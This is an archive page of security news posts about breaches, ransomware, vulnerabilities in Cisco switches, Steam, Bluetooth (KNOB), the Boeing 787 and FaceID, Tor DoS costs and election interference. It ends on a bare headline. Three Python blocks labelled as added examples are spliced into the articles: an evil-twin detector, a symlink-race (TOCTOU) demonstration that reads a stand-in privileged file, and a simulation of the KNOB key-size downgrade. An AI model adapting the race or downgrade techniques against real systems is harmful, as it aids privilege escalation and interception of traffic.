Category Archives: Hacking

Employees abused systems at Ukrainian nuclear power plant to mine cryptocurrency

The Ukrainian Secret Service is investigating the case of employees at a nuclear power plant who connected its systems to the Internet to mine cryptocurrency.

The Ukrainian Secret Service (SBU) launched an investigation after employees at a local nuclear power plant connected some systems of the internal network to the Internet to mine cryptocurrency.

The incident was first reported by the Ukrainian news site UNIAN.

Nuclear power plants are critical infrastructure; an incident of this kind could potentially expose highly sensitive information.

The security incident happened in July at the South Ukraine Nuclear Power Plant at Yuzhnoukrainsk, in the south of the country.

On July 10, agents of the SBU raided the nuclear power plant and discovered the equipment used by the employees to mine cryptocurrency.

The equipment was found in the power plant’s administration offices.

The Ukrainian authorities are currently investigating whether attackers may have used the exposed systems to access information that could threaten national security.

The SBU seized equipment consisting of two metal cases containing coolers and video cards (Radeon RX 470 GPUs), components commonly used in cryptocurrency mining rigs.

“Further, the SBU also found and seized additional equipment that looked like mining rigs in the building used as barracks by a military unit of the National Guard of Ukraine, tasked with guarding the power plant.” reported ZDNet.

The authorities have charged several employees, but at the time of writing none had been arrested.

In February 2018, a similar incident took place in Russia. Russian authorities arrested some employees at the Russian Federation Nuclear Center facility because they were suspected of trying to use a supercomputer at the plant to mine Bitcoin.

In April 2018, an employee at the Romanian National Research Institute for Nuclear Physics and Engineering abused the institute’s electrical network to mine cryptocurrency.

Pierluigi Paganini

(SecurityAffairs – nuclear power plant, hacking)

The post Employees abused systems at Ukrainian nuclear power plant to mine cryptocurrency appeared first on Security Affairs.

Cisco warns of the availability of public exploit code for critical flaws in Cisco Small Business switches

Cisco has updated its security advisories for three flaws affecting Cisco Small Business 220 Series Smart Switches that were patched in early August.

Cisco has updated its security advisories for three vulnerabilities in Cisco Small Business 220 Series Smart Switches that were patched in early August. The three vulnerabilities were reported by the security researcher Pedro Ribeiro, aka ‘bashis’, via Cisco’s VDOO Disclosure Program.

According to the Cisco Product Security Incident Response Team (PSIRT), public exploit code for these flaws is available online.

Cisco Small Business 220 Series Smart Switches

One of the vulnerabilities is a critical remote code execution issue tracked as CVE-2019-1913; an attacker could exploit it to execute arbitrary code with root privileges on the underlying operating system.

“Multiple vulnerabilities in the web management interface of Cisco Small Business 220 Series Smart Switches could allow an unauthenticated, remote attacker to overflow a buffer, which then allows the execution of arbitrary code with root privileges on the underlying operating system.” reads the security advisory.

“The vulnerabilities are due to insufficient validation of user-supplied input and improper boundary checks when reading data into an internal buffer. An attacker could exploit these vulnerabilities by sending malicious requests to the web management interface of an affected device. Depending on the configuration of the affected switch, the malicious requests must be sent via HTTP or HTTPS.”

Another flaw is an authentication bypass security flaw tracked as CVE-2019-1912 that resides in the web management interface of Cisco Small Business 220 Series Smart Switches. The flaw could be exploited by an attacker to modify the configuration of an affected device or to inject a reverse shell.

“A vulnerability in the web management interface of Cisco Small Business 220 Series Smart Switches could allow an unauthenticated, remote attacker to upload arbitrary files.” reads the security advisory.

“The vulnerability is due to incomplete authorization checks in the web management interface. An attacker could exploit this vulnerability by sending a malicious request to certain parts of the web management interface. Depending on the configuration of the affected switch, the malicious request must be sent via HTTP or HTTPS. A successful exploit could allow the attacker to modify the configuration of an affected device or to inject a reverse shell.”

The third flaw is a command injection vulnerability tracked as CVE-2019-1914 that an authenticated, remote attacker could exploit to launch a command injection attack.

The good news is that Cisco is not aware of attacks exploiting the above issues.

“The Cisco Product Security Incident Response Team (PSIRT) is aware of the existence of public exploit code. Cisco PSIRT is not aware of malicious use of the vulnerability that is described in this advisory.” states Cisco.

Cisco also released security patches to address 17 critical and high-severity vulnerabilities affecting some Cisco Unified Computing products (UCS) and Integrated Management Controller (IMC).

For these flaws too, Cisco confirmed it is not aware of attacks in the wild that have exploited them.

Pierluigi Paganini

(SecurityAffairs – Cisco Small Business, hacking)

The post Cisco warns of the availability of public exploit code for critical flaws in Cisco Small Business switches appeared first on Security Affairs.

The Dangers of Using Unsecured Wi-Fi Networks

Isn’t public Wi-Fi great? If you’re having a tea or coffee in a cafe or restaurant you can check your emails and social media.

If you’re waiting for a flight what better way to pass the time than logging onto your favourite website, checking your bank account or even doing a bit of online shopping? And you don’t have to pay a penny or cent. It’s free and you’re not eating into your data allowance. 

Except there’s a problem. Public Wi-Fi is notoriously insecure. Data that travels over a public hotspot network is rarely encrypted. This means that every time you use public Wi-Fi, anybody who is looking can see everything you are doing. They can see the passwords you use, your email address, your name and physical address, phone numbers and any other type of personal information that you might happen to enter into a website. They can certainly see the websites you are visiting. 

This information is gold dust to cyber criminals. It enables them to access and rake through your emails, target you with specific phishing mails, call you with targeted messages and even capture and exploit your payment card details if you happened to buy something online when using public Wi-Fi.

Hackers capture this unencrypted network traffic by interfering with the public Wi-Fi or by creating an ‘evil twin’, a fake network that looks legitimate but has actually been set up by the hacker. Because attackers are typically silently observing the public Wi-Fi traffic, these attacks are difficult to spot.

  • An attacker could see that a user is accessing a banking site and redirect the session to a fake website they have set up that emulates the legitimate one.
  • Attackers can also redirect users to a so-called ‘important’ download or update, which is actually a Trojan horse that plants malware on your device.

These attacks can also be easily automated. For instance, there are automated tools that look for passwords and write them into a file whenever they see one. There are automated attacks that wait for particular requests, such as accessing Amazon.com, designed to scoop up usernames and passwords.
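As an added illustration of the evil twin scenario described above (example code, not part of the original article): a Wi-Fi scanner records beacons for nearby networks, and the script below flags SSIDs advertised by access points that disagree on security mode or hardware vendor, then shows the client-side rule that stops a device from auto-joining an open twin of a saved WPA2 network. The beacon records, SSIDs and MAC addresses are constructed sample data.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str      # access point MAC address
    security: str   # "open", "wpa2" or "wpa3"
    channel: int


# Constructed data: what a scanner might record while sitting in a cafe.
OBSERVED = [
    Beacon("CafeFreeWiFi", "aa:bb:cc:11:22:33", "wpa2", 6),
    Beacon("CafeFreeWiFi", "de:ad:be:ef:00:01", "open", 11),  # twin: other vendor, no encryption
    Beacon("AirportGuest", "00:11:22:33:44:55", "open", 1),
    Beacon("AirportGuest", "00:11:22:33:44:56", "open", 1),   # same vendor and mode: normal multi-AP site
    Beacon("HomeNet", "10:20:30:40:50:60", "wpa3", 36),
]


def oui(bssid: str) -> str:
    """First three octets of the MAC, which identify the hardware vendor."""
    return bssid.lower()[:8]


def find_evil_twins(beacons):
    """Return {ssid: [reasons]} for SSIDs whose access points disagree with each other.

    A legitimate multi-AP network usually shares vendor OUI and security mode
    across its radios; an evil twin typically differs in at least one of them.
    """
    by_ssid = defaultdict(list)
    for b in beacons:
        by_ssid[b.ssid].append(b)

    alerts = {}
    for ssid, aps in by_ssid.items():
        if len(aps) < 2:
            continue
        reasons = []
        securities = {a.security for a in aps}
        if len(securities) > 1:
            reasons.append("mixed security modes: " + ", ".join(sorted(securities)))
        vendors = {oui(a.bssid) for a in aps}
        if len(vendors) > 1:
            reasons.append("different vendor OUIs: " + ", ".join(sorted(vendors)))
        if reasons:
            alerts[ssid] = reasons
    return alerts


def should_auto_join(saved_security: str, beacon: Beacon) -> bool:
    """Client-side mitigation: never auto-join a network whose security mode is
    weaker than the one saved for that SSID (e.g. an open twin of a WPA2 network)."""
    rank = {"open": 0, "wpa2": 1, "wpa3": 2}
    return rank[beacon.security] >= rank[saved_security]


if __name__ == "__main__":
    for ssid, reasons in find_evil_twins(OBSERVED).items():
        print(f"[!] {ssid}: " + "; ".join(reasons))
```

The heuristic has false positives (a legitimate network in WPA2/WPA3 transition mode also mixes security modes), so it is a trigger for a closer look rather than a verdict; the auto-join rule, by contrast, is safe to enforce unconditionally.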

In the name of self defence

These attacks aren’t theoretical. Hotels are a favorite target, especially during the holidays, but so are shopping malls, airports, cafes and different types of transport stations.

So what can you do to protect yourself? The answer is a virtual private network (VPN) which creates a private tunnel between your device and the internet and encrypts your data. It essentially locks down your network traffic so no one can see what you are doing when you use public Wi-Fi. 

BullGuard VPN, for instance, uses military grade encryption which would take more than a lifetime to crack. When confronted with this level of protection, hackers simply move on.

Further, it also protects you from other types of snooping, whether it’s companies trying to track your movements or even governments spying on their citizens. In short, you reclaim your privacy and can use the internet with total freedom and safety, even on public Wi-Fi.

About the Author

Susan Alexandra is a cybersecurity and privacy enthusiast. She writes for publications like GlobalSign, Tripwire, SecurityAffairs, SecurityToday and CyberDefenseMagazine. She is a small business owner, traveler and investor in cryptocurrencies. Susan’s inbox is open for new ideas and stories, feel free to share story ideas to susanalexandra67@gmail.com

Pierluigi Paganini

(SecurityAffairs – Wi-Fi, hacking)


The post The Dangers of Using Unsecured Wi-Fi Networks appeared first on Security Affairs.

Texas attackers demand $2.5 million to allow towns to access encrypted data

Crooks behind the attacks against Texas governments are now demanding $2.5 million to allow victims to access encrypted data.

The cybercriminals behind the wave of attacks that hit 23 Texas governments are now demanding $2.5 million to allow victims to access encrypted data.

The attacks started on the morning of August 16, and security experts investigating the incidents believe it was a coordinated attack carried out by a single cyber crime gang.

Initially, it was said that at least 23 local government organizations were impacted by the ransomware attacks. The Department of Information Resources (DIR) is still investigating them and providing support to mitigate the attacks; the evidence continues to point to a single threat actor.

The State Operations Center (SOC) was activated when the attacks were detected.

According to the Texas Department of Information Resources (DIR) the number of impacted towns has been reduced to 22.

“As of the time of this release, responders have engaged with all twenty-two entities to assess the impact to their systems and bring them back online.” reads an update provided by the DIR.

“More than twenty-five percent of the impacted entities have transitioned from response and assessment to remediation and recovery, with a number of entities back to operations as usual.”

The city of Keene confirmed the attack and announced it is working with law enforcement to resolve a cyber incident.

Another of the towns hit by the ransomware attack, the City of Borger, confirmed that business and financial operations and services were impacted, although basic and emergency services continued to be operational.

“On the morning of August 16, 2019 the City of Borger was one of more than 20 entities in Texas that reported a ransomware attack.” reads the press release published by the City of Borger.

“Currently, Vital Statistics (birth and death certificates) remains offline, and the City is unable to take utility or other payments. Until such time as normal operations resume, no late fees will be assessed, and no services will be shut off.”

Keene Mayor Gary Heinrich told NPR the attackers are asking for $2.5 million to unlock the files.

“Well, just about everything we do at City Hall is impacted,” Heinrich said.

“They got into our software provider, the guys who run our IT systems. A lot of folks in Texas use providers to do that, because we don’t have a staff big enough to have IT in house.”

Unfortunately, ransomware attacks are a big problem for US government and city offices; recently, several cities in Florida, including Key Biscayne, Riviera Beach and Lake City, fell victim to them.

In June, the City of Riviera Beach agreed to pay $600,000 in ransom to decrypt its data after a ransomware attack hit its computer systems. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Pierluigi Paganini

(SecurityAffairs – Texas, ransomware)

The post Texas attackers demand $2.5 million to allow towns to access encrypted data appeared first on Security Affairs.

A new Zero-Day in Steam client impacts over 96 million Windows users

A new zero-day vulnerability in the Steam client for Windows impacting over 96 million users was disclosed by researcher Vasily Kravets.

A new zero-day flaw in the Steam client for Windows impacts over 96 million users. The flaw is a privilege escalation vulnerability and it has been publicly disclosed by researcher Vasily Kravets.

Kravets is one of the researchers who discovered a first zero-day flaw in the Steam client for Windows. Valve initially addressed that issue, but researcher Xiaoyin Liu disclosed a bypass of Valve’s fix that re-enabled it.

Valve did not award Kravets and banned him from its bug bounty program.

Kravets decided to publicly disclose the privilege escalation, which attackers could exploit to run executables with the privileges of the Steam Client Service, which runs as NT AUTHORITY\SYSTEM.

The expert explained that he used BaitAndSwitch, a technique that combines the creation of links and oplocks to win a TOCTOU (time-of-check/time-of-use) race.

The attack scenario sees hackers getting remote code execution privileges by exploiting a vulnerability in a Steam game, a Windows app, or the OS itself, then elevating privileges by triggering this second zero-day to run a malicious payload using SYSTEM permissions.
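The class of bug described here, a privileged service that checks a path a less-privileged user controls and then uses it, is easiest to see side by side with the pattern that removes the window. The following Python is an added example, not Kravets’ PoC or Steam code: it uses POSIX `O_NOFOLLOW` and a descriptor check rather than the Windows links and oplocks in the original, and the file names and the `swap()` hook that stands in for the attacker winning the race are constructed for the demonstration.

```python
import os
import stat
import tempfile


def naive_read(path: str, between_check_and_use=None) -> bytes:
    """Check-then-use. The hook stands in for an attacker who wins the race and
    swaps the checked file for a link to something privileged."""
    if os.path.islink(path) or not os.path.isfile(path):
        raise PermissionError("refusing link or non-regular file")
    if between_check_and_use is not None:
        between_check_and_use()          # the window the check cannot cover
    with open(path, "rb") as f:          # follows whatever is now at `path`
        return f.read()


def safe_read(path: str) -> bytes:
    """Open first, refusing to follow a link, then validate the descriptor we
    actually hold, so the validated object and the used object are the same."""
    # O_NOFOLLOW is POSIX; where it is missing the flag below is 0 and the
    # S_ISREG check alone does not close the race.
    flags = os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0) | getattr(os, "O_CLOEXEC", 0)
    fd = os.open(path, flags)            # raises OSError (ELOOP) on a symlink
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("not a regular file")
        with os.fdopen(fd, "rb") as f:   # fdopen takes ownership of fd
            fd = -1
            return f.read()
    finally:
        if fd != -1:
            os.close(fd)


def demo():
    """Reproduce the race in a temp dir; returns (naive_result, safe_refused)."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "user_file.txt")    # path the service was asked to read
        secret = os.path.join(d, "privileged.txt")   # constructed stand-in for a protected file
        with open(target, "wb") as f:
            f.write(b"harmless")
        with open(secret, "wb") as f:
            f.write(b"privileged data")

        def swap():                                  # attacker wins the race
            os.remove(target)
            os.symlink(secret, target)

        naive_result = naive_read(target, between_check_and_use=swap)
        try:
            safe_read(target)
            safe_refused = False
        except OSError:                              # PermissionError is an OSError too
            safe_refused = True
        return naive_result, safe_refused


if __name__ == "__main__":
    print(demo())   # (b'privileged data', True)
```

The naive variant reads the privileged file because its check and its open are two separate filesystem lookups; the safe variant never has that gap, since it validates the descriptor it already holds.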

“As a result any code could be executed with maximum privileges, this vulnerability class is called «escalation of privileges» (eop) or «local privilege escalation» (lpe). Despite any application itself could be harmful, achieving maximum privileges can lead to much more disastrous consequences.” wrote Kravets. “For example, disabling firewall and antivirus, rootkit installation, concealing of process-miner, theft any PC user’s private data — is just a small portion of what could be done.”

Kravets published the following two PoC videos for this second zero-day flaw in Steam client for Windows. He demonstrated two methods that could be exploited by attackers to gain SYSTEM permissions on any Windows system running an unpatched Steam version.

Pierluigi Paganini

(SecurityAffairs – Steam client, zero-day)

The post A new Zero-Day in Steam client impacts over 96 million Windows users appeared first on Security Affairs.

DoS attacks against most used default Tor bridges could be very cheap

Researchers explained that carrying out attacks against the most used default Tor bridges would cost threat actors $17,000 per month.

According to security researchers Rob Jansen from the U.S. Naval Research Laboratory, and Tavish Vaidya and Micah Sherr from Georgetown University, launching denial-of-service (DoS) attacks against the most commonly used default Tor bridges would cost attackers $17,000 per month.

DoS attacks could be used to prevent users from accessing the popular anonymizing network, or as a component of attacks that de-anonymize Tor users with techniques such as traffic correlation.

For a modest sum, threat actors could target Tor bridges, saturating their resources and causing significant degradation of network performance.

In a research paper presented at the 2019 USENIX Security Symposium, the experts explained that targeting the entire Tor network with a DoS attack would be very expensive, costing millions of dollars each month, but that targeted attacks against specific Tor bridges are economically feasible.

“First, we explore an attack against Tor’s most commonly used default bridges (for censorship circumvention) and estimate that flooding those that are operational would cost $17K/mo. and could reduce client throughput by 44% while more than doubling bridge maintenance costs. Second, we explore attacks against the TorFlow bandwidth measurement system and estimate that a constant attack against all TorFlow scanners would cost $2.8K/mo. and reduce the median client download rate by 80%.” reads the paper. “Third, we explore how an adversary could use Tor to congest itself and estimate that such a congestion attack against all Tor relays would cost $1.6K/mo. and increase the median client download time by 47%. Finally, we analyze the effects of Sybil DoS and deanonymization attacks that have costs comparable to those of our attacks.”

The experts estimate that the total link capacity across the Tor network ranged from 429 to 575 Gbit/s over the year; for their research, they used the average of 512.73 Gbit/s. This means that an attacker would spend around $10,000 per hour to use a DoS stresser service to hit every Tor relay; the overall cost per month is $7.2 million.

An attack on Tor’s most commonly used default bridges and flooding them would only cost around $17,000 per month, in this way the attackers could reduce client throughput by 44% and more than double bridge maintenance costs. 

An attack aimed at all scanners in the TorFlow bandwidth measurement system would cost $2,800 per month and reduce the median client download rate by 80%.

The experts found that threat actors could use Tor to congest itself; such an attack would cost $1,600 per month and increase the median client download time by 47%.

In order to examine the performance of the network’s bridges, the experts focused on 25 default bridges that use the obfs4 obfuscation protocol, because most Tor bridge users rely on default bridges and obfs4.

“To test their performance, we use a modified version of Tor to download a 6 MiB file through each bridge. Surprisingly, we find that only 48% (12/25) of the obfs4 default bridges included in Tor Browser Bundle (TBB) are operational.” the experts continue. “The Tor Browser Bundle (TBB) includes a set of 38 hard-coded default bridges (as of version 8.0.3). Users who cannot directly access Tor relays can configure TBB to connect via one of these default bridges.”

To compare against the performance of unlisted bridges, the experts requested 135 unlisted obfs4 bridges from the Tor Project’s bridge authority via its web and email interfaces. 95 of the acquired unlisted bridges were found to be functional.

The researchers estimate that the cost of a DoS attack against all 38 default bridges would be around $31,000 per month. Considering that nation-state actors could be interested in targeting these default Tor bridges, this budget could be a good investment for them.

Experts explained that considering that 90% of bridge traffic passes through default bridges, forcing it to unlisted bridges could have a significant impact on network performance.

Tor bridges attacks

The study also compared the presented attack scenarios with launching a Sybil DoS attack, where the adversary could run Sybil relays and then arbitrarily degrade traffic performance or deny service by dropping circuits, or de-anonymize users by observing both the entry and exit points in a vulnerable circuit, and concludes that attacks on Tor bridges are more flexible and less expensive. 

“On the positive side, we find that Tor’s growth has made it more resilient at least to simple attacks: disrupting the service by naïvely flooding Tor relays using stresser services is an expensive proposition and requires $7.2M/month. Unfortunately, however, several aspects of Tor’s design and rollout make it susceptible to more advanced attacks.” the researchers conclude. “We find that Tor’s bridge infrastructure is heavily dependent on a small set of fixed default bridges, the operation of which can be disrupted at a cost of $17K/month.”

Further technical details on the attack techniques are reported in the interesting analysis published by the experts.

Pierluigi Paganini

(SecurityAffairs – Tor bridges, hacking)

The post DoS attacks against most used default Tor bridges could be very cheap appeared first on Security Affairs.

The Cost of Dealing With a Cybersecurity Attack in These 4 Industries

A cybersecurity issue can cause unexpected costs in several different areas. What is the cost of dealing with an attack in four industries?

A cybersecurity issue can cause unexpected costs in several different areas. In addition to the monetary costs associated with things like lost productivity and improving network security to reduce the likelihood of future incidents, affected companies have to deal with the costs tied to reduced customer trust and damaged reputations.

It’s not always easy or straightforward to pinpoint the overall costs of recovering from a cyberattack. The totals also vary by industry. However, here’s some research that illuminates the various financial impacts for these four sectors.

1. Health Care

Health care is particularly vulnerable to cyberattacks. Criminals are aware that facilities typically handle large numbers of records containing exceptionally in-demand information that is 10 times more valuable on the black market than a credit card number. A report from Carbon Black showed that two-thirds of respondents said cyberattacks had gotten more sophisticated over the past year, too.

A victimized health care organization spends an average of $1.4 million to recover from a cyber incident. It also doesn’t help that many health care organizations are not promptly aware of cyberattacks. Experts say that most organizations don’t discover active cyberattacks for at least 18 months.

The longer an attack progresses without detection, the more costly the damage will likely be to fix. And, the costs go up if the health care facility does not have a cybersecurity response plan to use after an attack gets identified.

2. Retail

As people have growing opportunities to shop online, the chances for hackers to carry out lucrative cyberattacks in the retail sector also go up. Statistics from 2016 showed that the average cost per compromised retail record was $172. Some of the costs relate to hiring consultants to get to the bottom of breaches and paying fines to payment processors or credit card brands for insufficient security.

People are becoming less tolerant of retailers that have widescale data breaches. Additionally, the convenience and choice offered by online shopping increase the likelihood that if a person stops doing business with one retailer, they can probably find what they need elsewhere.

3. Manufacturing

The manufacturing industry was not always known to embrace connected technology, but that’s changing. Many brands recognize that keeping their machines connected to the internet can assist them with tracking trends, avoiding downtime and more.

One of the reasons why it’s tough to calculate a straightforward figure for cyberattacks is that there are so many related costs that may not be immediately apparent. For example, manufacturing companies can expect a cyberattack itself to cost about $1.7 million. But, other expenses can quickly stack up, including those related to lost productivity, customer churn and the need to hire extra staff members to help with cleaning up after a cyberattack.

Analysts also say that the manufacturing industry is extremely attractive to hackers. In addition to planning attacks that cause supply chain disruptions, cybercriminals may target manufacturing entities as part of nation-state attacks. Although those make up a small percentage of overall attacks, they took 500 times longer to resolve in 2017 than the previous year.

4. Finance

The very nature of the financial industry and the money it handles make the sector ripe for a cyberattack. It also tops the list of annual cybercrime costs at about $18 million.

But, the costs also vary depending on the type of attack a financial brand suffers. A report published collaboratively by two organizations showed that the average cost of a malware attack for a financial brand was $825,000. But, the expenses climb dramatically for a distributed denial of service (DDoS) attack. The expenses of those incidents are approximately $1.8 million.

The number of attacks on the financial industry is going up, too. Research associated with entities in the United Kingdom confirmed a five-fold increase in reported hacks on financial institutions in 2018 compared to 2017. That trend suggests that financial institutions have to be especially vigilant to protect against future attacks. Doing so often requires substantial financial resources.

Moving in a Worrying Direction

This list gives snapshots of the cybersecurity costs associated with particular industries. But, even sectors that are not on this list should be concerned about potential losses. Many cybersecurity experts agree that the expenses of cyberattacks, in general, are steadily going up.

The expenses and effort required for resolution are also impacted by the growing complexity of cybercriminals’ tactics.

Dealing with the initial aftermath of an attack is only the beginning. Companies also have to assure customers that they’ve taken steps to prevent other problems — and stay committed to that promise.

All of these aspects require significant financial investments, as well as a recognition that cyberattacks are genuine threats to tackle.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post The Cost of Dealing With a Cybersecurity Attack in These 4 Industries appeared first on Security Affairs.

Boost Your Bluetooth Security: 3 Tips to Prevent KNOB Attacks

Many of us use Bluetooth technology for its convenience and sharing capabilities. Whether you’re using wireless headphones or quickly Airdropping photos to your friend, Bluetooth has a variety of benefits that users take advantage of every day. But like many other technologies, Bluetooth isn’t immune to cyberattacks. According to Ars Technica, researchers have recently discovered a weakness in the Bluetooth wireless standard that could allow attackers to intercept device keystrokes, contact lists, and other sensitive data sent from billions of devices.

The Key Negotiation of Bluetooth attack, or “KNOB” for short, exploits this weakness by forcing two or more devices to choose an encryption key just a single byte in length before establishing a Bluetooth connection, allowing attackers within radio range to quickly crack the key and access users’ data. From there, hackers can use the cracked key to decrypt data passed between devices, including keystrokes from messages, address books uploaded from a smartphone to a car dashboard, and photos.

What makes KNOB so stealthy? For starters, the attack doesn’t require a hacker to have any previously shared secret material or to observe the pairing process of the targeted devices. Additionally, the exploit keeps itself hidden from Bluetooth apps and the operating systems they run on, making it very difficult to spot the attack.
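To make concrete why a one-byte key matters and where a fix has to sit, here is an added Python model of the key-size negotiation that KNOB abuses. It is not from the article or the KNOB paper: the two-message exchange, the `tamper` hook that models an attacker in radio range rewriting the key-size field, and the 7-octet minimum enforced by the hardened device are simplifications and assumptions chosen for illustration.

```python
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass
class Controller:
    """One Bluetooth controller's view of the encryption-key-size negotiation."""
    name: str
    max_octets: int = 16   # strongest key this device supports
    min_octets: int = 1    # 1 octet is the permissive floor the attack relies on

    def propose(self) -> int:
        return self.max_octets

    def respond(self, proposed: int) -> Optional[int]:
        """Accept the largest size both sides support, or abort below the floor."""
        size = min(proposed, self.max_octets)
        return size if size >= self.min_octets else None

    def confirm(self, size: int) -> bool:
        return self.min_octets <= size <= self.max_octets


def negotiate(a: Controller, b: Controller,
              tamper: Optional[Callable[[int], int]] = None) -> Optional[int]:
    """Run the two-message negotiation. `tamper` rewrites the key-size field of
    each message in flight. Returns the agreed size in octets, or None on abort."""
    proposal = a.propose()
    if tamper:
        proposal = tamper(proposal)
    accepted = b.respond(proposal)
    if accepted is None:
        return None                      # b refused: connection aborted
    if tamper:
        accepted = tamper(accepted)
    return accepted if a.confirm(accepted) else None


def keyspace(octets: int) -> int:
    """Number of candidate keys an eavesdropper must try to recover the key."""
    return 2 ** (8 * octets)


def downgrade_to_one_byte(_: int) -> int:
    """Attacker's rewrite: every key-size field becomes 1 octet."""
    return 1


def run_scenarios():
    permissive = Controller("phone (permissive)")
    hardened = Controller("car kit (hardened)", min_octets=7)   # threshold is an assumption
    return {
        "no attacker": negotiate(permissive, Controller("headset")),
        "attack, both permissive": negotiate(permissive, Controller("headset"), downgrade_to_one_byte),
        "attack, one side hardened": negotiate(permissive, hardened, downgrade_to_one_byte),
    }


if __name__ == "__main__":
    for scenario, size in run_scenarios().items():
        outcome = "aborted" if size is None else f"{size} octet(s), {keyspace(size)} candidate keys"
        print(f"{scenario}: {outcome}")
```

The point of the model is that the downgrade succeeds only because both sides treat 1 octet as acceptable; a floor enforced by either device aborts the connection instead of completing it with a key that `keyspace(1)` shows can be tried exhaustively, which is what the vendor patches mentioned below do in effect.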

While the Bluetooth Special Interest Group (the body that oversees the wireless standard) has not yet provided a fix, there are still several ways users can protect themselves from this threat. Follow these tips to help keep your Bluetooth-compatible devices secure:

  • Adjust your Bluetooth settings. To avoid this attack altogether, turn off Bluetooth in your device settings.
  • Beware of what you share. Make it a habit to not share sensitive, personal information over Bluetooth.
  • Turn on automatic updates. A handful of companies, including Microsoft, Apple, and Google, have released patches to mitigate this vulnerability. To ensure that you have the latest security patches for vulnerabilities such as this, turn on automatic updates in your device settings.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Boost Your Bluetooth Security: 3 Tips to Prevent KNOB Attacks appeared first on McAfee Blogs.

Software Vulnerabilities in the Boeing 787

Boeing left its software unprotected, and researchers have analyzed it for vulnerabilities:

At the Black Hat security conference today in Las Vegas, Santamarta, a researcher for security firm IOActive, plans to present his findings, including the details of multiple serious security flaws in the code for a component of the 787 known as a Crew Information Service/Maintenance System. The CIS/MS is responsible for applications like maintenance systems and the so-called electronic flight bag, a collection of navigation documents and manuals used by pilots. Santamarta says he found a slew of memory corruption vulnerabilities in that CIS/MS, and he claims that a hacker could use those flaws as a foothold inside a restricted part of a plane's network. An attacker could potentially pivot, Santamarta says, from the in-flight entertainment system to the CIS/MS to send commands to far more sensitive components that control the plane's safety-critical systems, including its engine, brakes, and sensors. Boeing maintains that other security barriers in the 787's network architecture would make that progression impossible.

Santamarta admits that he doesn't have enough visibility into the 787's internals to know if those security barriers are circumventable. But he says his research nonetheless represents a significant step toward showing the possibility of an actual plane-hacking technique. "We don't have a 787 to test, so we can't assess the impact," Santamarta says. "We're not saying it's doomsday, or that we can take a plane down. But we can say: This shouldn't happen."

Boeing denies that there's any problem:

In a statement, Boeing said it had investigated IOActive's claims and concluded that they don't represent any real threat of a cyberattack. "IOActive's scenarios cannot affect any critical or essential airplane system and do not describe a way for remote attackers to access important 787 systems like the avionics system," the company's statement reads. "IOActive reviewed only one part of the 787 network using rudimentary tools, and had no access to the larger system or working environments. IOActive chose to ignore our verified results and limitations in its research, and instead made provocative statements as if they had access to and analyzed the working system. While we appreciate responsible engagement from independent cybersecurity researchers, we're disappointed in IOActive's irresponsible presentation."

This being Black Hat and Las Vegas, I'll say it this way: I would bet money that Boeing is wrong. I don't have an opinion about whether or not it's lying.

Bypassing Apple FaceID’s Liveness Detection Feature

Apple's FaceID has a liveness detection feature, which prevents someone from unlocking a victim's phone by putting it in front of his face while he's sleeping. That feature has been hacked:

Researchers on Wednesday during Black Hat USA 2019 demonstrated an attack that allowed them to bypass a victim's FaceID and log into their phone simply by putting a pair of modified glasses on their face. By merely placing tape carefully over the lenses of a pair of glasses and placing them on the victim's face, the researchers demonstrated how they could bypass Apple's FaceID in a specific scenario. The attack itself is difficult, given the bad actor would need to figure out how to put the glasses on an unconscious victim without waking them up.

Chinese cyberhackers ‘blurring line between state power and crime’

Cybersecurity firm FireEye says ‘aggressive’ APT41 group working for Beijing is also hacking video games to make money

A group of state-sponsored hackers in China ran activities for personal gain at the same time as undertaking spying operations for the Chinese government in 14 different countries, the cybersecurity firm FireEye has said.

In a report released on Thursday, the company said the hacking group APT41 was different to other China-based groups tracked by security firms in that it used non-public malware typically reserved for espionage to make money through attacks on video game companies.


Bipartisan Senate Support Reveals Russian Election Interference

A report from the Senate Intelligence Committee released last week concluded that the Russian government extensively interfered in U.S. elections from 2014 to at least 2017.

The partially redacted bipartisan report describes several findings related to Russian activities, including:

  • “While the Committee does not know with confidence what Moscow’s intentions were, Russia may have been probing vulnerabilities in voting systems to exploit later… [or] may have sought to undermine confidence in the 2016 U.S. election simply through the discovery of their activity.”

  • “State election officials… were not sufficiently warned or prepared to handle an attack from a hostile nation-state actor.”

  • “DHS and FBI alerted states to the threat of cyber attacks in… 2016, but the warnings did not provide enough information or go to the right people.”

  • “In 2016, cybersecurity for electoral infrastructure at the state and local level was sorely lacking… [V]oter registration databases were not as secure as they could have been. Aging voting equipment… were vulnerable to exploitation by a committed adversary.”

While citing an “unprecedented level of activity,” the report also maintains that it found no evidence of the alteration of vote tallies, but it qualified its position by stating that “the Committee and IC’s insight into this are limited.”

The report details evidence of Russian activity targeting elections in all 50 states in 2016, and cites an inability on the part of the Committee or Department of Homeland Security to determine a clear pattern or goal. DHS representatives are quoted as saying that “there wasn’t a clear red state-blue state-purple state more electoral votes, less electoral votes” pattern.

The report concluded with a series of recommendations, including creating a policy of deterrence and responses to attacks on election infrastructure to “send a clear message and create significant costs for the perpetrator.” Strengthening cyber defenses for election-related systems, replacing outdated equipment, and providing greater funding for states were also recommended.

“I hope the bipartisan findings and recommendations outlined in this report will underscore to the White House and all of our colleagues, regardless of political party, that this threat remains urgent, and we have a responsibility to defend our democracy against it,” said committee member Senator Mark Warner in a statement. 

The post Bipartisan Senate Support Reveals Russian Election Interference appeared first on Adam Levin.

The Content Streaming Gold Rush is a Hacker’s El Dorado

